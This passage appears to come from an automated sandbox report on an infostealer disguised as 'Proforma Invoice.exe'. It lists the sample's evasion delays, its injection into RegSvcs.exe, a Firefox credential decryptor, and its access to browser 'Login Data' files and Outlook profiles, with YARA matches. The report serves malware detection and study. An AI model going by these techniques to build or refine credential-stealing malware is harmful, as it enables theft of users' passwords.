                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Proforma Invoice.exeAPI/Special instruction interceptor: Address: 1E53244
                Source: Proforma Invoice.exe, 00000000.00000002.1769227511.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXERIVE)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599120Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598738Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598370Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597811Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596388Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595837Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595280Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2137Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7714Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeAPI coverage: 4.8 %
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0070445A
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070C6D1 FindFirstFileW,FindClose,0_2_0070C6D1
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0070C75C
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0070EF95
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0070F0F2
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0070F3F3
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_007037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007037EF
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00703B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00703B12
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0070BCBC
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006A49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006A49A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599120Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598738Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598370Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597811Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596388Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595837Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595280Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593859Jump to behavior
                Source: Proforma Invoice.exe, 00000000.00000003.1756810135.0000000001289000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000003.1756962646.0000000001299000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000003.1756922934.0000000001289000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000003.1756810135.000000000126A000.00000004.00000020.00020000.00000000.sdmp, disimmure.0.drBinary or memory string: *|(RqEMUTs\cEVQ
                Source: RegSvcs.exe, 00000001.00000002.4215596032.0000000001208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\Proforma Invoice.exeAPI call chain: ExitProcess graph end nodegraph_0-100460
                Source: C:\Users\user\Desktop\Proforma Invoice.exeAPI call chain: ExitProcess graph end nodegraph_0-101439
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05697210 LdrInitializeThunk,LdrInitializeThunk,1_2_05697210
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00713F09 BlockInput,0_2_00713F09
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006A3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_006A3B3A
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006D5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_006D5A7C
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006A4B37 LoadLibraryA,GetProcAddress,0_2_006A4B37
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_01E53510 mov eax, dword ptr fs:[00000030h]0_2_01E53510
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_01E534B0 mov eax, dword ptr fs:[00000030h]0_2_01E534B0
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_01E51E70 mov eax, dword ptr fs:[00000030h]0_2_01E51E70
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006F80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_006F80A9
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006CA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006CA155
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006CA124 SetUnhandledExceptionFilter,0_2_006CA124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\Proforma Invoice.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F7F008Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006F87B1 LogonUserW,0_2_006F87B1
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006A3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_006A3B3A
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006A48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_006A48D7
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00704C7F mouse_event,0_2_00704C7F
                Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Proforma Invoice.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006F7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006F7CAF
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006F874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006F874B
                Source: Proforma Invoice.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Proforma Invoice.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006C862B cpuid 0_2_006C862B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006D4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006D4E87
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006E1E06 GetUserNameW,0_2_006E1E06
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006D3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_006D3F3A
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006A49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006A49A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice.exe.1e60000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7324, type: MEMORYSTR
                Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice.exe.1e60000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7324, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Proforma Invoice.exeBinary or memory string: WIN_81
                Source: Proforma Invoice.exeBinary or memory string: WIN_XP
                Source: Proforma Invoice.exeBinary or memory string: WIN_XPe
                Source: Proforma Invoice.exeBinary or memory string: WIN_VISTA
                Source: Proforma Invoice.exeBinary or memory string: WIN_7
                Source: Proforma Invoice.exeBinary or memory string: WIN_8
                Source: Proforma Invoice.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice.exe.1e60000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, type: UNPACKEDPE
